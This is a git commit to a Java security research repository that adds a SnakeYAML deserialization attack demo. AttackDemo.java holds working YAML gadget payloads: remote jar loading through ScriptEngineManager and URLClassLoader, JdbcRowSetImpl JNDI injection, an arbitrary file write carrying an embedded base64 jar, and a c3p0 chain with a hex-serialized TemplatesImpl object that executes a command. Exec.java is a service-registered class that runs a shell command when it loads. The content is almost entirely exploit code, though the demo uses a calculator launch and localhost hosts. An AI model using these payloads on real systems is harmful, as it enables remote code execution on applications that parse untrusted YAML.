add Snakeyaml demo :)

Author: Whoopsunix

README.md

@@ -40,6 +40,7 @@ By. Whoopsunix
     - [JavaBean](#jarbean)
     - [XStream](#xstream)
   - [构造方法利用](#constructorexp)
+  - [Snakeyaml](#snakeyaml)
 - [0x07 文件读写 Demo](#0x07-文件读写-demo)
 - [0x08 XXE 有回显测试 Demo](#0x08-xxe-有回显测试-demo)
 - [鸣谢](#Thanks)
@@ -250,6 +251,11 @@ JDBC 序列化的知识可以参考这些项目 [JDBC-Attack](https://github.com
 
 - xml
 
+## [Snakeyaml](Serialization/SnakeyamlDemo)
+
+- ScriptEngineManager
+- c3p0
+
 ### XStream
 
 主要为 CVE 不具体展开，<= 1.4.17 的生成集成在 yso 项目中

Serialization/SnakeyamlDemo/pom.xml

@@ -0,0 +1,54 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>com.ppp</groupId>
+    <artifactId>SnakeyamlDemo</artifactId>
+    <version>1.0</version>
+    <packaging>jar</packaging>
+
+    <name>SnakeyamlDemo</name>
+
+    <properties>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.yaml</groupId>
+            <artifactId>snakeyaml</artifactId>
+            <version>1.33</version>
+        </dependency>
+        <dependency>
+            <groupId>com.mchange</groupId>
+            <artifactId>c3p0</artifactId>
+            <version>0.9.5.5</version>
+        </dependency>
+        <dependency>
+            <groupId>com.alibaba</groupId>
+            <artifactId>fastjson</artifactId>
+            <version>1.2.80</version>
+        </dependency>
+    </dependencies>
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <configuration>
+                    <source>6</source>
+                    <target>6</target>
+                </configuration>
+            </plugin>
+        </plugins>
+        <resources>
+            <resource>
+                <directory>src/main/resources</directory>
+                <filtering>true</filtering>
+                <includes>
+                    <include>META-INF/**</include>
+                </includes>
+            </resource>
+        </resources>
+    </build>
+</project>

Serialization/SnakeyamlDemo/src/main/java/com/ppp/AttackDemo.java

@@ -0,0 +1,39 @@
+package com.ppp;
+
+import org.yaml.snakeyaml.Yaml;
+
+/**
+ * @author Whoopsunix
+ */
+public class AttackDemo {
+    public static void main(String[] args) {
+        String jar = "!!javax.script.ScriptEngineManager [\n" +
+                "  !!java.net.URLClassLoader [[\n" +
+                "    !!java.net.URL [\"http://127.0.0.1:1234/SnakeyamlDemo-1.0.jar\"]\n" +
+                "  ]]\n" +
+                "]";
+
+
+
+        String jndi = "!!com.sun.rowset.JdbcRowSetImpl\n" +
+                "dataSourceName: rmi://127.0.0.1:1099/vldykm\n" +
+                "autoCommit: true";
+
+
+        String fileWrite = "!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File [\"/tmp/test.jar\"],false],!!java.util.zip.Inflater  { input: !!binary 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 },1048576]]";
+        String jarLocal = "!!javax.script.ScriptEngineManager [\n" +
+                "  !!java.net.URLClassLoader [[\n" +
+                "    !!java.net.URL [\"file:///tmp/test.jar\"]\n" +
+                "  ]]\n" +
+                "]";
+
+        // open -a Calculator.app
+        String hex = "ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B78700000000000000000757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E002000078700000018ACAFEBABE00000032001D01000852756E74696D65440700010100106A6176612F6C616E672F4F626A6563740700030100063C696E69743E010003282956010004436F64650C000500060A000400080100116A6176612F6C616E672F52756E74696D6507000A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C000C000D0A000B000E0100166F70656E202D612043616C63756C61746F722E61707008001001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C001200130A000B001401001453657269616C56657273696F6E55494444656D6F0100014A0571E669EE3C6D471801000D436F6E7374616E7456616C756501000A536F7572636546696C6501000D52756E74696D65442E6A61766100210002000400000001001A001600170001001A0000000200180001000100050006000100070000001A000200010000000E2AB70009B8000F1211B6001557B1000000000001001B00000002001C7571007E000A000001CECAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C650100047468697301000350505001000C496E6E6572436C61737365730100214C636F6D2F7070702F73696E6B732F54656D706C61746573496D706C245050503B01000A536F7572636546696C6501001254656D706C61746573496D706C2E6A6176610C000A000B07001A01001F636F6D2F7070702F73696E6B732F54656D706C61746573496D706C245050500100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001B636F6D2F7070702F73696E6B732F54656D706C61746573496D706C002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D00000006000100000127000E0000000C000100000005000F001200000002001300000002001400110000000A0001000200160010000970740006616E7953747270770100787372002E6A617661782E6D616E6167656D656E742E42616441747472696275746556616C7565457870457863657074696F6ED4E7DAAB632D46400200014C000376616C7400124C6A6176612F6C616E672F4F626A6563743B787200136A6176612E6C616E672E457863657074696F6ED0FD1F3E1A3B1CC4020000787200136A6176612E6C616E672E5468726F7761626C65D5C635273977B8CB0300044C000563617573657400154C6A6176612F6C616E672F5468726F7761626C653B4C000D64657461696C4D65737361676571007E00055B000A737461636B547261636574001E5B4C6A6176612F6C616E672F537461636B5472616365456C656D656E743B4C001473757070726573736564457863657074696F6E737400104C6A6176612F7574696C2F4C6973743B787071007E0015707572001E5B4C6A6176612E6C616E672E537461636B5472616365456C656D656E743B02462A3C3CFD22390200007870000000057372001B6A6176612E6C616E672E537461636B5472616365456C656D656E746109C59A2636DD8502000449000A6C696E654E756D6265724C000E6465636C6172696E67436C61737371007E00054C000866696C654E616D6571007E00054C000A6D6574686F644E616D6571007E000578700000003274001B636F6D2E7070702E636861696E2E6A736F6E2E466173744A736F6E74000D466173744A736F6E2E6A617661740008676574436861696E7371007E00180000002971007E001A71007E001B7400096765744F626A6563747371007E00180000001374001C636F6D2E7070702E4F626A6563745061796C6F61644275696C6465727400194F626A6563745061796C6F61644275696C6465722E6A6176617400076275696C6465727371007E0018000000F8740012636F6D2E7070702E4761646765745465737474000F476164676574546573742E6A61766174001454656D706C61746573496D706C52756E74696D657371007E00180000001E71007E002471007E00257400046D61696E737200266A6176612E7574696C2E436F6C6C656374696F6E7324556E6D6F6469666961626C654C697374FC0F2531B5EC8E100200014C00046C69737471007E00147872002C6A6176612E7574696C2E436F6C6C656374696F6E7324556E6D6F6469666961626C65436F6C6C656374696F6E19420080CB5EF71E0200014C0001637400164C6A6176612F7574696C2F436F6C6C656374696F6E3B7870737200136A6176612E7574696C2E41727261794C6973747881D21D99C7619D03000149000473697A657870000000007704000000007871007E002E787372001E636F6D2E616C69626162612E666173746A736F6E2E4A534F4E417272617900000000000000010200014C00046C69737471007E001478707371007E002D0000000177040000000171007E00077878";
+        String c3p0Hex = "!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\n" +
+                "userOverridesAsString: HexAsciiSerializedMap:" + hex + ';';
+
+
+        Yaml yaml = new Yaml();
+        yaml.load(c3p0Hex);
+    }
+}

Serialization/SnakeyamlDemo/src/main/java/com/ppp/Exec.java

@@ -0,0 +1,78 @@
+package com.ppp;
+
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineFactory;
+import java.util.List;
+
+/**
+ * @author Whoopsunix
+ */
+public class Exec implements ScriptEngineFactory {
+    public Exec() {
+        try {
+            System.out.println("Exec");
+            Runtime.getRuntime().exec("open -a Calculator.app");
+        } catch (Exception e) {
+        }
+    }
+
+    @Override
+    public String getEngineName() {
+        return null;
+    }
+
+    @Override
+    public String getEngineVersion() {
+        return null;
+    }
+
+    @Override
+    public List<String> getExtensions() {
+        return null;
+    }
+
+    @Override
+    public List<String> getMimeTypes() {
+        return null;
+    }
+
+    @Override
+    public List<String> getNames() {
+        return null;
+    }
+
+    @Override
+    public String getLanguageName() {
+        return null;
+    }
+
+    @Override
+    public String getLanguageVersion() {
+        return null;
+    }
+
+    @Override
+    public Object getParameter(String key) {
+        return null;
+    }
+
+    @Override
+    public String getMethodCallSyntax(String obj, String m, String... args) {
+        return null;
+    }
+
+    @Override
+    public String getOutputStatement(String toDisplay) {
+        return null;
+    }
+
+    @Override
+    public String getProgram(String... statements) {
+        return null;
+    }
+
+    @Override
+    public ScriptEngine getScriptEngine() {
+        return null;
+    }
+}

Serialization/SnakeyamlDemo/src/main/java/com/ppp/Utils.java

@@ -0,0 +1,69 @@
+package com.ppp;
+
+import sun.misc.BASE64Encoder;
+
+import java.io.*;
+import java.util.zip.Deflater;
+
+/**
+ * @author Whoopsunix
+ */
+public class Utils {
+    public static void main(String[] args) throws Exception {
+        String str = create("/Users/ppp/Documents/pppRepository/github_file/JavaRce/Serialization/SnakeyamlDemo/target/SnakeyamlDemo-1.0.jar", "/tmp/test.jar");
+    }
+
+    public static String create(String SrcPath, String Destpath) throws Exception {
+        File file = new File(SrcPath);
+        Long FileLength = file.length();
+        byte[] FileContent = new byte[FileLength.intValue()];
+        try {
+            FileInputStream in = new FileInputStream(file);
+            in.read(FileContent);
+            in.close();
+        } catch (FileNotFoundException e) {
+            e.printStackTrace();
+        }
+        byte[] compressbytes = compress(FileContent);
+        String base64str = base64encoder(compressbytes);
+        String poc = "!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File [\"" + Destpath + "\"],false],!!java.util.zip.Inflater  { input: !!binary " + base64str + " },1048576]]";
+        System.out.println(poc);
+        return poc;
+    }
+
+    public static String base64encoder(byte[] bytes) throws Exception {
+        String base64str = new sun.misc.BASE64Encoder().encode(bytes);
+        base64str = base64str.replaceAll("\n|\r", "");
+        return base64str;
+    }
+
+    public static byte[] compress(byte[] data) {
+        byte[] output = new byte[0];
+
+        Deflater compresser = new Deflater();
+
+        compresser.reset();
+        compresser.setInput(data);
+        compresser.finish();
+        ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length);
+        try {
+            byte[] buf = new byte[1024];
+            while (!compresser.finished()) {
+                int i = compresser.deflate(buf);
+                bos.write(buf, 0, i);
+            }
+            output = bos.toByteArray();
+        } catch (Exception e) {
+            output = data;
+            e.printStackTrace();
+        } finally {
+            try {
+                bos.close();
+            } catch (IOException e) {
+                e.printStackTrace();
+            }
+        }
+        compresser.end();
+        return output;
+    }
+}

Serialization/SnakeyamlDemo/src/main/resources/META-INF/services/javax.script.ScriptEngineFactory

@@ -0,0 +1 @@
+com.ppp.Exec

Utils/src/main/java/org/ppp/tools/encryption/B64.java

@@ -50,6 +50,12 @@ public String encodeStr(byte[] b) {
         return "";
     }
 
+    public static String base64encoder(byte[] bytes) throws Exception {
+        String base64str = new sun.misc.BASE64Encoder().encode(bytes);
+        base64str = base64str.replaceAll("\n|\r", "");
+        return base64str;
+    }
+
     // file
     public String encodeFile(String filePath) throws Exception {
         InputStream in = new FileInputStream(filePath);